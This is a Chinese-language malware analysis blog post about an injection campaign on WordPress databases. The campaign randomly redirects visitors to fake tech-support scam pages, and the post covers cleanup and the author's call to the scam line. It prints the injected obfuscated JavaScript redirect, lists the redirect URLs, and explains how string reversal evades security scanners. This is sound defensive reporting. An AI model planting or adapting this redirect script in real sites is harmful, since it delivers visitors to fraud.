WordPress数据库反向Javascript注入重定向钓鱼网站

反向网址随机重定向到诈骗:

我们看到数百个被感染的WordPress站点被随机的wp_posts表中的脚本(在一行中)注入。

$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string")
return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};
$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www/​/:ptth'=ferh.​noitacol.tnemucod"];
var number1=Math.floor(Math.random() * 5);if (number1=​=3){var delay = 15000;setTimeout(​$vTB$I_919AeEAw2z$KX(0), delay);}

该代码随机(概率为20%左右)在15秒超时之后,将访问者重定向到各种骗局网站(例如“浏览器评论赢取iPad”或“技术支持”诈骗)。重定向链通常包含像3cal1ingc0nstant3111212[.]tk3worthysupp0rt310121[.]tktechsupport60512123456[.]tk2bestsupp0rt310121[.]tk,(他们经常改变)和balans.shahterworld[.]org
第一个重定向URL是在注入的脚本内以相反的形式(我们 经常看到这个混淆技巧)硬编码的。在上述情况下,重定向代码解码为此

document.location​.href='hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php'
这不是此广告系列中唯一使用的重定向网址。我们检查了200多个受感染的网站,发现这4个网址 - 所有这些网址都是在被黑网站上。
hxxp://emarketing-immobilier[.]com/wp-content/plugins/gotmls/safe-load/plugin-settings.php
hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php
hxxp://kodmax[.]com/wp-content/plugins/twitter-widget-pro/lib/class.widget.php
hxxp://nh70putera[.]com/wp-content/plugins/login-lockdown/plugin-settings.php

反向Javascript注入重定向:

试图将访问者重定向到一个虚假的Windows支持页面,他们的计算机感染了“ 风险软件”,并将被禁用,除非他们称之为明显虚假支持热线。


谷歌和其他一些网络安全厂商目前正在列入黑名单; 幸运的是,大多数访问者在重定向过程中会收到如下警告页面:

技术支持电话诈骗

值得注意的是,页面上显示的电话号码是基于提供的URL自动生成的。这使攻击者可以在包含不同电话号码的多个广告系列中重复使用相同的代码。
当我将URL中的电话号码参数更改为?number=this-is-totally-a-scam that’s the one that popped up on my screen:

重定向和虚假支持这样的骗局并不是什么新鲜事,但是关于这个代码有一些有趣的事情。在尝试排除问题出现的位置时,我在重定向过程中将流量记录在浏览器中,并注意到在一个完全独立的站点上加载了一些代码:
www[.]katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php
根据我们到目前为止看到的情况,远程站点上的文件名和位置看起来是随机的。所以很自然地,我继续搜索这个其他网站的文件结构和数据库,但是空手而归。

反向混淆

一旦我手动检查他们的WordPress管理仪表板中的一个帖子,问题就变得很明显:

恶意JS注射

这个脚本被注入了数百次。正如我们上面所看到的,恶意软件反转有效载荷文件的域和URL – 使用.split(“”)。reverse()。join(“”) – 以防止检测。
一些安全插件会通知用户,如果在他们的数据库中找到链接或对列入黑名单的域的引用,但是如果字符串被反转,则很可能会逃避检测。不是一个新的伎俩,但有趣的是。
网站登陆后重定向的速度也会有所不同,这使得受感染网站和虚假支持页面之间的链接变得更加流畅,不那么直接。

删除WordPress注入

脚本被注入数据库的方式是使用上传到服务器的数据库管理工具。到目前为止,我所使用的所有案例都使用了过时和易受攻击的WordPress版本,但是我不能完全确定该文件是通过代码中的漏洞上传还是已经被盗用。无论如何,一旦脚本被放置在网站上,攻击者就可以将任何他们想要的东西注入到数据库中。
幸运的是,删除注入非常简单,因为所有注入的脚本都是相同的,只需要在数据库wp_posts 表中进行简单的搜索/替换即可。

调用诈骗者

所以在这一点上,我做了什么好的安全分析师会做的 – 我称之为“支持”号码。
我遇到了一些暂停的音乐,然后在几秒钟后重新开始。过了一分钟左右,我和一个听起来像是在海外呼叫中心的人联系起来。
我告诉他我的屏幕上的警告,他问我在电脑上发生了什么。他还问我是否有一台笔记本电脑或台式机,然后问我的名字的电话。之后,他让我按下电脑上的Windows键。想耍傻,浪费时间,我假装不明白。那时候,那家伙就挂了我!我打了几次电话,但断开了连接。他们可能会把我的号码标记为浪费他们的时间,或者那个家伙知道我正在上他们。

典型的事件查看器骗局

我对接下来会有一个很好的想法。他会要求我按下“R”键来运行命令提示符,打开事件查看器,并向我展示大量的良性错误,以声称我的计算机已被感染。接下来,他们会问我购买一个昂贵的“支持”软件包,以解决我的电脑上的“问题”。
我当然在猜测,但是我以前曾经看过这些骗局。这些类型的骗局是非常普遍的,不幸的是,我们中最脆弱的是倾向于受害者。

促进诈骗的意识

大多数人的头脑中首先想到的是一个虚弱的老奶奶,相信这个骗子说的话。
有趣的是,微软最近的一项研究发现,事实恰恰相反,千禧一代比其他任何人口都更容易出现这类骗局。传播意识是很重要的,所以你认识的人不会成为受害者。
根据我的经验,大多数技术支持诈骗都会给在家的人们打个电话,吓唬他们让他们远程访问他们的电脑。有趣的是,日常的WordPress网站正在受到攻击,作为这些活动的一部分,让人们自己打电话给骗子。
如果您被重定向到这些虚假网站之一,或者如果您主动打电话说您的计算机受到感染,请尽你的公民责任,并尽可能长时间保持在线。你花在电话上的每一分钟都少了一分钟,他们打电话给一个更容易受骗的人,他可能真的被欺骗,给他们钱。

Leave a Reply